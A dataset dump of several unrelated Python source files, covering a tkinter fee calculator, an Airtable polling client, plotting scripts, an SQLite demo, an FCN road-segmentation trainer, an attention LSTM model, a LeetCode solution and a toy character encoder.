honorary_end_date = (\n + float((day_two.loc[day_two.shifts == 'Night'].hour)\n * float(fare_dict_end.get(\"night_subsequent_hour_fare\")))\n + float((day_two.loc[day_two.shifts == 'Day'].hour)\n * float(fare_dict_end.get(\"day_subsequent_hour_fare\"))))\n\n honorary_total = int(honorary_start_date + honorary_end_date)\n\n print(' ')\n honorary_mess = 'You are owed ' + str(honorary_total) + ' euros.'\n print(honorary_mess)\n\n return ('Start date: ' + str(start_date) + ' '\n + 'End date: ' + str(end_date) + ' '\n + start_date_mess + ' '\n + end_date_mess + ' '\n + main_mess + ' '\n + honorary_mess)\n\n# Output actual GUI\n\nfrom tkinter import *\nfrom tkcalendar import *\nfrom tkinter import messagebox\n\nroot = Tk()\nroot.title(\"Honorary Calculator\")\n\n#frame_start_date = LabelFrame(root, text='Start Date (Y-M-D)',padx=10,pady=10)\n#frame_start_date.grid(row=0,column=0,padx=10,pady=10)\n\ncal_start_date = Calendar(root, selectmode=\"day\",year=2020, month=6, day=1)\ncal_start_date.grid(row=1,column=0,padx=10,pady=10)\n\nframe_start_hour = LabelFrame(root, text='Start Hour(Hour from 0 to 24)',padx=10,pady=10)\nframe_start_hour.grid(row=0,column=0,padx=10,pady=10)\n\n#frame_end_date = LabelFrame(root, text='End Date (Y-M-D)',padx=10,pady=10)\n#frame_end_date.grid(row=0,column=1,padx=10,pady=10)\n\ncal_end_date = Calendar(root, selectmode=\"day\",year=2020, month=6, day=1)\ncal_end_date.grid(row=1,column=1,padx=10,pady=10)\n\nframe_end_hour = LabelFrame(root, text='End Hour (Hour from 0 to 24)',padx=10,pady=10)\nframe_end_hour.grid(row=0,column=1,padx=10,pady=10)\n\n#e_start_date = Entry(cal_start_date,width=35,bg=\"black\", fg='white', borderwidth=5)\n#_end_date = Entry(frame_end_date,width=35,bg=\"black\", fg='white', borderwidth=5)\ne_start_hour = Entry(frame_start_hour,width=35,bg=\"black\", fg='white', borderwidth=5)\ne_end_hour = Entry(frame_end_hour,width=35,bg=\"black\", fg='white', 
borderwidth=5)\n\n#e_start_date.grid(row=0,column=0)\n#e_end_date.grid(row=0,column=1)\ne_start_hour.grid(row=1,column=0)\ne_end_hour.grid(row=1,column=1)\n\ndef popup():\n messagebox.showinfo('Honorary Results', calculate_honorary(start_date=str(cal_start_date.get_date()) + ' '+ str(e_start_hour.get()+':00:00'),\n end_date=str(cal_end_date.get_date()) + ' ' + str(e_end_hour.get()+':00:00'),\n normal_dict=normal_dict,\n holiday_dict=holiday_dict)\n )\n\n# Define Buttons\n\nbutton_confirm = Button(root, text=\"Calculate!\", padx=40, pady=20, command=popup)\n\n\n# Put the buttons on screen\n\nbutton_confirm.grid(row=2, column=0, columnspan=3)\n\nbutton_quit = Button(root, text = 'Exit Calculator', command=root.quit)\nbutton_quit.grid(row=3, column=0, columnspan=3)\n\nroot.mainloop()\n","sub_path":"src/honorary_gui/honorary_calc_message.py","file_name":"honorary_calc_message.py","file_ext":"py","file_size_in_byte":11422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"451992291","text":"\"\"\"Tools for interacting with airtable\n\nIncludes:\n- Base models, for creating classes from airtable records\n- \"Meta\" base models\n + Track the record's status field\n + Additional JSON metadata for the automation\n- Table specs for associating models, table names, and misc\n- A table poller for executing callbacks on status changes\n\n\"\"\"\n\nimport abc\nimport datetime\nimport logging\nfrom typing import Callable, Dict, Optional, Set, Type\n\nimport pydantic\n\nfrom airtable import Airtable as _AirtableClient\n\nfrom .. import config\n\nlogger = logging.getLogger(__name__)\n\n\n##########\n# CONSTS #\n##########\n\nDEFAULT_POLL_TABLE_MAX_NUM_RETRIES = 3\n\n\n###############\n# BASE MODELS #\n###############\n\n\n# TODO : consider not allowing users change the id field\nclass BaseModel(pydantic.BaseModel, abc.ABC):\n id: str\n created_at: datetime.datetime\n\n class Config:\n allow_population_by_field_name = True\n\n @classmethod\n def from_airtable(cls, raw_dict):\n return cls(\n id=raw_dict[\"id\"],\n created_at=raw_dict[\"createdTime\"],\n **raw_dict[\"fields\"],\n )\n\n def to_airtable(self):\n fields = self.dict(by_alias=True, exclude_none=True)\n del fields[\"id\"]\n del fields[\"created_at\"]\n\n return {\n \"id\": self.id,\n \"fields\": fields,\n }\n\n\n# TODO : should this class inheret from ABC?\nclass MetaBaseModel(BaseModel, abc.ABC):\n meta: Optional[pydantic.Json] = pydantic.Field(default=None, alias=\"_meta\")\n meta_last_seen_status: Optional[str] = pydantic.Field(\n default=None, alias=\"_meta_last_seen_status\"\n )\n status: Optional[str] = pydantic.Field(default=None, alias=\"Status\")\n\n @staticmethod\n @abc.abstractmethod\n def get_valid_statuses() -> Set[str]:\n ...\n\n @pydantic.validator(\"status\", allow_reuse=True)\n @pydantic.validator(\"meta_last_seen_status\", allow_reuse=True)\n def validate_status(cls, v):\n valid_statuses = cls.get_valid_statuses()\n\n if v not in valid_statuses:\n raise ValueError(\n \"Status '{}' not in valid statuses: {}\".format(\n v, \", \".join(valid_statuses)\n )\n )\n\n return v\n\n\n#########\n# TABLE #\n#########\n\n\nclass TableSpec(pydantic.BaseModel):\n name: str\n model_cls: Type[BaseModel]\n status_to_cb: Dict[Optional[str], Callable[[BaseModel], BaseModel]]\n\n def get_airtable_name(self):\n return config.Config.load().airtable.table_names[self.name]\n\n # TODO : add a `status_to_cb` validator that calls `get_valid_statuses`\n\n\n##########\n# CLIENT #\n##########\n\n\nclass 
AirtableClient:\n def __init__(self, read_only=False):\n self._read_only = read_only\n self._table_name_to_client = {}\n\n def _get_client(self, table_spec):\n if table_spec.name not in self._table_name_to_client.keys():\n self._table_name_to_client[table_spec.name] = _AirtableClient(\n config.Config.load().airtable.base_id,\n table_spec.get_airtable_name(),\n config.Config.load().airtable.api_key,\n )\n\n return self._table_name_to_client[table_spec.name]\n\n def get_all(self, table_spec, formula=None):\n return [\n table_spec.model_cls.from_airtable(raw)\n for raw in self._get_client(table_spec).get_all(formula=formula)\n ]\n\n def poll(self, table_spec):\n # TODO : sort by creation time asc\n\n # NOTE here is a formula for querying on a blank status\n # TODO : get rid of this if we don't need it\n # \"IF(\"\n # \"{{Status}} = BLANK(),\"\n # # If blank...\n # \"{{_meta_last_seen_status}} != \\\"{blank_sentinel}\\\",\"\n # # If not blank...\n # \"{{Status}} != {{_meta_last_seen_status}}\"\n # \")\"\n\n return [\n table_spec.model_cls.from_airtable(raw)\n for raw in self._get_client(table_spec).get_all(\n formula=(\n \"AND({Status} != BLANK(), \"\n \"{Status} != {_meta_last_seen_status})\"\n )\n )\n ]\n\n def iter(self, table_spec):\n for page in self._get_client(table_spec).get_iter():\n for raw in page:\n yield table_spec.model_cls.from_airtable(raw)\n\n def update(self, table_spec, model):\n if self._read_only:\n return\n\n self._get_client(table_spec).update(\n model.id,\n model.to_airtable()[\"fields\"],\n )\n\n\n#########\n# UTILS #\n#########\n\n# TODO : handle missing statuses (e.g. airtable field was updated)\ndef poll_table(\n client, table_spec, max_num_retries=DEFAULT_POLL_TABLE_MAX_NUM_RETRIES\n):\n logger.info(\"Polling table: {}\".format(table_spec.name))\n\n success = True\n\n for record in client.poll(table_spec):\n assert record.status is not None\n\n logger.info(\n \"Processing '{}' record: {}\".format(table_spec.name, record)\n )\n\n try:\n original_id = record.id\n original_status = record.status\n\n cb = table_spec.status_to_cb.get(record.status)\n\n if cb is None:\n logger.info(\n \"No callback for record with status '{}': {}\".format(\n record.status,\n record.id,\n )\n )\n continue\n\n for num_retries in range(max_num_retries):\n try:\n cb(record) # noqa: F841\n break\n except Exception:\n logger.exception(\n (\n \"Callback '{}' for record failed \"\n \"(num retries {}): {}\"\n ).format(\n num_retries,\n cb.__qualname__,\n record.id,\n )\n )\n else:\n logger.error(\n \"Callback '{}' for record did not succeed: {}\".format(\n cb.__qualname__, record.id\n )\n )\n success = False\n\n if original_id != record.id:\n raise ValueError(\n (\n \"Callback '{}' modified the ID of the record: \"\n \"original={}, new={}\"\n ).format(\n cb.__qualname__,\n original_id,\n record.id,\n )\n )\n finally:\n record.meta_last_seen_status = original_status\n\n # Update the record in airtable to reflect local modifications\n client.update(table_spec, record)\n\n return success\n","sub_path":"automation/utils/airtable.py","file_name":"airtable.py","file_ext":"py","file_size_in_byte":6842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"274709067","text":"import json\n\n\ninfile = open(\"US_fires_9_14.json\", \"r\")\noutfile = open(\"readable_9_14.json\", \"w\")\n\nfires_data = json.load(infile)\n\njson.dump(fires_data, outfile, indent=4)\n\n# Get data\nbrightness_list, lons, lats = [], [], []\n\nfor x in fires_data:\n bright_instance 
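A toy round trip through the BaseModel helpers above; the Volunteer subclass and its values are invented for illustration. The pydantic aliases are what let an Airtable column name differ from the Python attribute:

import pydantic

class Volunteer(BaseModel):  # BaseModel as defined in this module
    name: str = pydantic.Field(alias='Name')

raw = {'id': 'rec123', 'createdTime': '2021-01-01T00:00:00+00:00',
       'fields': {'Name': 'Ada'}}
v = Volunteer.from_airtable(raw)
assert v.to_airtable() == {'id': 'rec123', 'fields': {'Name': 'Ada'}}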
= x[\"brightness\"]\n lon = x[\"longitude\"]\n lat = x[\"latitude\"]\n\n brightness_list.append(bright_instance)\n lons.append(lon)\n lats.append(lat)\n\nfires_over_450 = [i for i in brightness_list if i > 450]\nprint(fires_over_450[:10])\nprint(lats[:10])\n\n# Graph:\nfrom plotly.graph_objs import Scattergeo, Layout\nfrom plotly import offline as offline\n\ndata = [\n {\n \"type\": \"scattergeo\",\n \"lon\": lons,\n \"lat\": lats,\n \"text\": brightness_list,\n \"marker\": {\n \"size\": [5 * bright_instance for bright_instance in brightness_list],\n \"color\": brightness_list,\n \"colorscale\": \"Viridis\",\n \"reversescale\": True,\n # \"colorbar\": {\"title\": \"Brightness\"},\n },\n }\n]\n\nmy_layout = Layout(title=\"Fires with Brightness over 450\")\n\nfig = {\"data\": data, \"layout\": my_layout}\n\noffline.plot(fig, filename=\"fire_brightness.html\")\n","sub_path":"JSON_HW.py","file_name":"JSON_HW.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"494161164","text":"#!/usr/bin/env python\n\n# encoding: utf-8\n\n'''\n@author: Jiadong Lin, Xi'an Jiaotong University, Leiden University\n\n@contact: jiadong324@gmail.com\n\n@time: 2020/3/2\n'''\n\nfrom matplotlib import pyplot as plt\nimport os\n\n\nclass PlotSingleImg():\n\n def __init__(self, segments_orignal, refLength, readLength, outDir, title):\n\n self.figure_size = 8\n self.ratio = 2\n self.title = title\n self.segments_orignal = segments_orignal\n\n self.readLength = int(readLength / self.ratio)\n self.refLength = int(refLength / self.ratio)\n\n self.outDir = outDir\n self.plot()\n\n def plot(self):\n\n figsize = self.figure_size, self.figure_size\n\n fig, ax1 = plt.subplots(1, 1, figsize=figsize)\n\n for seg in self.segments_orignal:\n\n if seg.forward():\n ax1.plot([seg.yStart(), seg.yEnd()], [seg.xStart(), seg.xEnd()], color='b', linewidth=2)\n else:\n ax1.plot([seg.yStart(), seg.yEnd()], [seg.xStart(), seg.xEnd()], color='r', linewidth=2)\n\n\n ax1.spines['right'].set_visible(False)\n ax1.spines['top'].set_visible(False)\n\n ax1.xaxis.set_ticks_position('top')\n ax1.yaxis.set_ticks_position('left')\n\n plt.xticks([])\n plt.yticks([])\n\n font = {\n 'weight': 'normal',\n 'size': 10,\n }\n\n ax1.set_ylabel('VARIATION', font)\n ax1.set_xlabel('REFERENCE', font)\n ax1.set_title(self.title, font)\n ax1.xaxis.set_ticks_position('top')\n ax1.invert_yaxis()\n\n # plt.show()\n plt.savefig(os.path.join(self.outDir))","sub_path":"plot/PlotSigleImg.py","file_name":"PlotSigleImg.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"136881867","text":"import sqlite3\n\ndb_conn = sqlite3.connect('demo_data.sqlite3')\ndb_cursor = db_conn.cursor()\n\ncreate_table = 'CREATE TABLE demo (s VARCHAR(1), x INTEGER, y INTEGER);'\ndb_cursor.execute(create_table)\n\ndata_entry_1 = 'INSERT INTO demo VALUES(\\'g\\', 3, 9);'\ndata_entry_2 = 'INSERT INTO demo VALUES(\\'v\\', 5, 7);'\ndata_entry_3 = 'INSERT INTO demo VALUES(\\'f\\', 8, 7);'\ndb_cursor.execute(data_entry_1)\ndb_cursor.execute(data_entry_2)\ndb_cursor.execute(data_entry_3)\n\ndb_conn.commit()\n\ncount_rows_query = 'SELECT count(*) FROM demo;'\ncount_rows = db_cursor.execute(count_rows_query).fetchone()[0]\n\"\"\"Number of rows\"\"\"\nprint(f'Total number of rows: {count_rows}')\n\ncount_at_least_5_query = ('SELECT count(*) FROM ' +\n '(SELECT x, y FROM demo ' +\n 'WHERE x >= 5 and y >= 5);'\n 
)\ncount_at_least_5 = db_cursor.execute(count_at_least_5_query).fetchone()[0]\n\"\"\"Rows where X and Y are at least 5\"\"\"\nprint(f'Total number of rows with x and y at least 5: {count_at_least_5}')\n\ncount_distinct_y_query = 'SELECT count(DISTINCT y) FROM demo;'\ncount_distinct_y = db_cursor.execute(count_distinct_y_query).fetchone()[0]\n\"\"\"Number of Unique Values in y\"\"\"\nprint(f'Unique values of y: {count_distinct_y}')\n\ndb_cursor.close()\ndb_conn.close()\n","sub_path":"DSPT1-Sprint-10/demo_data.py","file_name":"demo_data.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"412867469","text":"import os.path\nimport tensorflow as tf\nimport helper\nimport warnings\nfrom distutils.version import LooseVersion\nimport project_tests as tests\nimport datetime\n\n# Check TensorFlow Version\nassert LooseVersion(tf.__version__) >= LooseVersion('1.0'), 'Please use TensorFlow version 1.0 or newer. You are using {}'.format(tf.__version__)\nprint('TensorFlow Version: {}'.format(tf.__version__))\n\n# Check for a GPU\nif not tf.test.gpu_device_name():\n warnings.warn('No GPU found. Please use a GPU to train your neural network.')\nelse:\n print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))\n\n\ndef load_vgg(sess, vgg_path):\n \"\"\"\n Load Pretrained VGG Model into TensorFlow.\n :param sess: TensorFlow Session\n :param vgg_path: Path to vgg folder, containing \"variables/\" and \"saved_model.pb\"\n :return: Tuple of Tensors from VGG model (image_input, keep_prob, layer3_out, \n layer4_out, layer7_out)\n \"\"\"\n # Use tf.saved_model.loader.load to load the model and weights\n vgg_tag = 'vgg16'\n vgg_input_tensor_name = 'image_input:0'\n vgg_keep_prob_tensor_name = 'keep_prob:0'\n vgg_layer3_out_tensor_name = 'layer3_out:0'\n vgg_layer4_out_tensor_name = 'layer4_out:0'\n vgg_layer7_out_tensor_name = 'layer7_out:0'\n tf.saved_model.loader.load(sess, [vgg_tag], vgg_path)\n print(\"load_vgg ====================================================\")\n graph = tf.get_default_graph()\n image_input = graph.get_tensor_by_name(vgg_input_tensor_name)\n keep_prob = graph.get_tensor_by_name(vgg_keep_prob_tensor_name)\n layer3_out = graph.get_tensor_by_name(vgg_layer3_out_tensor_name)\n layer4_out = graph.get_tensor_by_name(vgg_layer4_out_tensor_name)\n layer7_out = graph.get_tensor_by_name(vgg_layer7_out_tensor_name)\n\n \n return image_input, keep_prob, layer3_out, layer4_out, layer7_out\n# tests.test_load_vgg(load_vgg, tf)\n\n\ndef layers(vgg_layer3_out, vgg_layer4_out, vgg_layer7_out, num_classes):\n \"\"\"\n Create the layers for a fully convolutional network. 
Build skip-layers using the vgg layers.\n    :param vgg_layer7_out: TF Tensor for VGG Layer 7 output\n    :param vgg_layer4_out: TF Tensor for VGG Layer 4 output\n    :param vgg_layer3_out: TF Tensor for VGG Layer 3 output\n    :param num_classes: Number of classes to classify\n    :return: The Tensor for the last layer of output\n    \"\"\"\n    print(\"layers ====================================================\")\n    layer7_1x1 = tf.layers.conv2d(vgg_layer7_out, num_classes, 1, (1, 1), padding='same',\n                                  kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),\n                                  kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n    layer4_1x1 = tf.layers.conv2d(vgg_layer4_out, num_classes, 1, (1, 1), padding='same',\n                                  kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),\n                                  kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n    layer3_1x1 = tf.layers.conv2d(vgg_layer3_out, num_classes, 1, (1, 1), padding='same',\n                                  kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),\n                                  kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n\n    layer7_out = tf.layers.conv2d_transpose(layer7_1x1, num_classes, 4, 2, padding='same',\n                                            kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),\n                                            kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n\n    conv4sum = tf.add(layer7_out, layer4_1x1)\n    conv_layer4_out = tf.layers.conv2d_transpose(conv4sum, num_classes, 4, 2, padding='same',\n                                                 kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),\n                                                 kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n\n    conv3sum = tf.add(conv_layer4_out, layer3_1x1)\n    final_layer = tf.layers.conv2d_transpose(conv3sum, num_classes, 16, 8, padding='same',\n                                             kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),\n                                             kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3), name='final_layer')\n    # print(final_layer.get_shape())\n    # tf.Print(final_layer, [tf.shape(final_layer)])\n    return final_layer\n# tests.test_layers(layers)\n\n\ndef optimize(nn_last_layer, correct_label, learning_rate, num_classes):\n    \"\"\"\n    Build the TensorFlow loss and optimizer operations.\n    :param nn_last_layer: TF Tensor of the last layer in the neural network\n    :param correct_label: TF Placeholder for the correct label image\n    :param learning_rate: TF Placeholder for the learning rate\n    :param num_classes: Number of classes to classify\n    :return: Tuple of (logits, train_op, cross_entropy_loss)\n    \"\"\"\n    print(\"optimize ====================================================\")\n    # nn_last_layer = tf.Print(nn_last_layer, [tf.shape(nn_last_layer)[3]])\n    logits = tf.reshape(nn_last_layer, (-1, num_classes), name=\"logits\")\n\n    # logits = tf.Print(logits, [tf.shape(logits), tf.shape(correct_label)])\n    # reshaped_labels = tf.reshape(correct_label, (-1, num_classes))\n    # logits = tf.Print(logits, [tf.shape(logits), tf.shape(reshaped_labels)])\n    # iou, iou_op = tf.metrics.mean_iou(reshaped_labels, logits, 2)\n\n    # Tensorflow IOU\n    # y_true_f = tf.reshape(reshaped_labels, [-1])\n    # y_pred_f = tf.reshape(logits, [-1])\n    # inter = tf.reduce_sum(tf.multiply(y_pred_f, y_true_f))\n    # union = tf.reduce_sum(tf.subtract(tf.add(y_pred_f, y_true_f), tf.multiply(y_pred_f, y_true_f)))\n    # loss = tf.subtract(tf.constant(1.0, dtype=tf.float32), tf.div(inter, union))\n    # intersection = tf.reduce_sum(y_true_f * y_pred_f)\n    # loss = tf.constant(1.0)-(tf.constant(2.) 
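# Worked check of the upsampling arithmetic in layers() above, assuming the
# standard VGG16 feature strides (pool3 -> 1/8, pool4 -> 1/16, conv7 -> 1/32
# of the input resolution), which is what this FCN-8s-style skip wiring expects:
#   conv2d_transpose(stride=2) on conv7:   1/32 -> 1/16, then add the pool4 skip
#   conv2d_transpose(stride=2) on the sum: 1/16 -> 1/8,  then add the pool3 skip
#   conv2d_transpose(stride=8) on the sum: 1/8  -> 1/1   (input resolution)
# Total upsampling 2 * 2 * 8 == 32, matching conv7's downsampling factor.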
* intersection) / (tf.reduce_sum(y_true_f) + tf.reduce_sum(y_pred_f))\n\n cross_entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\n labels=correct_label, logits=logits))\n optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cross_entropy_loss)\n\n return logits, optimizer, cross_entropy_loss\n# tests.test_optimize(optimize)\n\ndef lr_generator(lr):\n original_rate = lr\n rate = lr\n max_deviation = 0.3\n change_rate = 0.1 * original_rate\n direction = 1\n while True:\n if rate == round(original_rate * (1 - max_deviation), 10):\n direction = 1\n elif rate == round(original_rate * (1+max_deviation), 10):\n direction = -1\n rate = rate + direction * change_rate\n rate = round(rate, 10)\n yield rate\n\n\ndef train_nn(sess, epochs, batch_size, get_batches_fn, train_op, cross_entropy_loss, input_image,\n correct_label, keep_prob, learning_rate):\n \"\"\"\n Train neural network and print out the loss during training.\n :param sess: TF Session\n :param epochs: Number of epochs\n :param batch_size: Batch size\n :param get_batches_fn: Function to get batches of training data. Call using get_batches_fn(batch_size)\n :param train_op: TF Operation to train the neural network\n :param cross_entropy_loss: TF Tensor for the amount of loss\n :param input_image: TF Placeholder for input images\n :param correct_label: TF Placeholder for label images\n :param keep_prob: TF Placeholder for dropout keep probability\n :param learning_rate: TF Placeholder for learning rate\n \"\"\"\n # TODO: Implement function\n keep_probability = 1.0\n lr_gen = lr_generator(0.001)\n\n # generator = get_batches_fn(batch_size)\n # image, label = next(generator)\n\n\n sess.run(tf.global_variables_initializer())\n sess.run(tf.local_variables_initializer())\n for e in range(epochs):\n i = 0\n lr = next(lr_gen)\n print('=====running epoch: {} with lr: {}'.format(e, lr))\n for image, label in get_batches_fn(batch_size):\n # generator = get_batches_fn(batch_size)\n # image, label = next(generator)\n feed_dict = {input_image: image,\n correct_label: label,\n keep_prob: keep_probability,\n learning_rate: lr\n }\n logits = tf.get_default_graph().get_tensor_by_name('logits:0')\n\n _, loss, out = sess.run([train_op, cross_entropy_loss, logits], feed_dict=feed_dict)\n\n i += 1\n if i % 5 == 0:\n print('loss:{}'.format(loss))\n\n\n\n # sess.run([train_op], {correct_label: np.arange(np.prod(shape)).reshape(shape), learning_rate: 10})\n # test, loss = sess.run([layers_output, cross_entropy_loss], {correct_label: np.arange(np.prod(shape)).reshape(shape)})\n\n# tests.test_train_nn(train_nn)\n\n\ndef run():\n epochs = 50\n batch_size = 10\n num_classes = 2\n image_shape = (160, 576)\n data_dir = './data'\n runs_dir = './runs'\n tests.test_for_kitti_dataset(data_dir)\n\n # Download pretrained vgg model\n helper.maybe_download_pretrained_vgg(data_dir)\n\n # OPTIONAL: Train and Inference on the cityscapes dataset instead of the Kitti dataset.\n # You'll need a GPU with at least 10 teraFLOPS to train on.\n # https://www.cityscapes-dataset.com/\n\n with tf.Session() as sess:\n # Path to vgg model\n vgg_path = os.path.join(data_dir, 'vgg')\n # Create function to get batches\n get_batches_fn = helper.gen_batch_function(os.path.join(data_dir, 'data_road/training'), image_shape)\n\n correct_label = tf.placeholder(tf.float32, [None, None, None, num_classes], name=\"correct_label\")\n # learning_rate = tf.placeholder(tf.float32)\n # keep_prob = tf.placeholder(tf.float32, name='keep_prob')\n learning_rate = 
tf.placeholder(tf.float32, name='learning_rate')\n # OPTIONAL: Augment Images for better results\n # https://datascience.stackexchange.com/questions/5224/how-to-prepare-augment-images-for-neural-network\n\n # TODO: Build NN using load_vgg, layers, and optimize function\n input_image, keep_prob, vgg_layer3_out, vgg_layer4_out, vgg_layer7_out = load_vgg(sess, vgg_path)\n layers_output = layers(vgg_layer3_out, vgg_layer4_out, vgg_layer7_out, num_classes)\n logits, optimizer, cross_entropy_loss = optimize(layers_output, correct_label, learning_rate, num_classes)\n # TODO: Train NN using the train_nn function\n train_nn(sess, epochs, batch_size, get_batches_fn,\n optimizer, cross_entropy_loss, input_image,\n correct_label, keep_prob, learning_rate)\n # TODO: Save inference data using helper.save_inference_samples\n helper.save_inference_samples(runs_dir, data_dir, sess, image_shape, logits, keep_prob, input_image)\n\n # OPTIONAL: Apply the trained model to a video\n\n\nif __name__ == '__main__':\n a = datetime.datetime.now()\n run()\n b = datetime.datetime.now()\n print('Time taken: {}'.format(b - a))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"591958914","text":"from models import BaseModel\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as f\nfrom models.cnn import CNN\nfrom models.attention import NoQueryAttention\n\nclass ATAE_LSTM(BaseModel):\n def __init__(self, filed = 80):\n super(ATAE_LSTM, self).__init__()\n self.filed = filed\n self.cnn_l = CNN(filed=self.filed)\n self.rnn_l = nn.LSTM(\n input_size=80,\n hidden_size=64,\n num_layers=4,\n batch_first=True)\n\n self.attention = NoQueryAttention(128, score_function='bi_linear')\n\n self.linear = nn.Sequential(\n nn.Linear(64, 64),\n nn.Linear(64, 2),\n )\n\n\n def forward(self, x_l):\n\n x_l = x_l.view(-1, x_l.size(-2), x_l.size(-1))\n c_out_l = self.cnn_l(x_l)\n batch, cheight, cwidth =c_out_l.size()\n r_in_l = c_out_l.clone()\n for i in range(cheight):\n r_in_l[:,i,:] = c_out_l[:,-1,:]\n # print(r_in_l.shape)\n r_in_l = torch.cat((c_out_l,r_in_l), dim=2)\n h_n_l, (_, _) = self.rnn_l(r_in_l)\n batch, cheight, cwidth = h_n_l.size()\n h_n = h_n_l.clone()\n for i in range(cheight):\n h_n[:,i,:] = h_n_l[:,-1,:]\n h_n = torch.cat((h_n_l, h_n), dim=2)\n # print(h_n.shape)\n _, score = self.attention(h_n)\n # print(score.shape)\n output = torch.squeeze(torch.bmm(score, h_n_l), dim=1)\n # print(output.shape)\n out = self.linear(output)\n return f.log_softmax(out, dim=1)\n\n","sub_path":"code/OC-IAN/models/atae_lstm.py","file_name":"atae_lstm.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"636730362","text":"\"\"\"\n865. 
Smallest Subtree with all the Deepest Nodes\n\n\nGiven the root of a binary tree, the depth of each node is the shortest distance to the root.\n\nReturn the smallest subtree such that it contains all the deepest nodes in the original tree.\n\nA node is called the deepest if it has the largest depth possible among any node in the entire tree.\n\nThe subtree of a node is tree consisting of that node, plus the set of all descendants of that node.\n\nNote: This question is the same as 1123: https://leetcode.com/problems/lowest-common-ancestor-of-deepest-leaves/\n\n\n\nExample 1:\n\n\nInput: root = [3,5,1,6,2,0,8,null,null,7,4]\nOutput: [2,7,4]\nExplanation: We return the node with value 2, colored in yellow in the diagram.\nThe nodes coloured in blue are the deepest nodes of the tree.\nNotice that nodes 5, 3 and 2 contain the deepest nodes in the tree but node 2 is the smallest subtree among them, so we return it.\nExample 2:\n\nInput: root = [1]\nOutput: [1]\nExplanation: The root is the deepest node in the tree.\nExample 3:\n\nInput: root = [0,1,3,null,2]\nOutput: [2]\nExplanation: The deepest node in the tree is 2, the valid subtrees are the subtrees of nodes 2, 1 and 0 but the subtree of node 2 is the smallest.\n\n\nConstraints:\n\nThe number of nodes in the tree will be in the range [1, 500].\n0 <= Node.val <= 500\nThe values of the nodes in the tree are unique.\n\n\n\n\"\"\"\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass SubtreeWithAllDeepest:\n\n def doit_search(self, root):\n\n depth = 0\n res = None\n\n def search(node, length):\n\n nonlocal depth\n nonlocal res\n\n if not node:\n return length\n\n l = search(node.left, length + 1)\n r = search(node.right, length + 1)\n\n ans = max(l, r)\n if depth < ans:\n depth = ans\n res = node\n\n if l == r == depth:\n res = node\n\n return ans\n\n search(root, 0)\n return res\n","sub_path":"PythonLeetcode/leetcodeM/865_SmallestSubtreewithalltheDeepestNodes.py","file_name":"865_SmallestSubtreewithalltheDeepestNodes.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"120776810","text":"#3\n########################################\n# Programmer:Benji Saltz\n# Date: oct.19/16\n# File Name: encoder.py\n# Description: Makes letters of a word translate to ascii and shows what symbols represent the word\n########################################\ndef messageencoder():\n \"\"\"\n (str)->(str)\n turns the letters of the word to symbols according to the ascii outcome\n\n enter a sentence: I am coding\n >>>h\u0017kd(`lh`mm\n \"\"\"\n #main\n import random\n text=''\n\n for i in range(0,len(sentence)):\n addtract = random.randint(1,10)\n code=ord(sentence[i])\n\n if(addtract%2==0):\n code2=code+addtract\n else:\n code2=code-addtract\n text+=chr(code2)\n return text\nsentence = str(input(\"enter the sentence: \"))\nprint(messageencoder())\n","sub_path":"Gr.11 Computer Science/Gr.11-Computer-Science-Advanced-Functions-Message-Encoder-Final.py","file_name":"Gr.11-Computer-Science-Advanced-Functions-Message-Encoder-Final.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"433152231","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 22 20:02:44 2017\n\n@author: xiaoqian\n\"\"\"\n#from NIMS to BSL\nfrom 
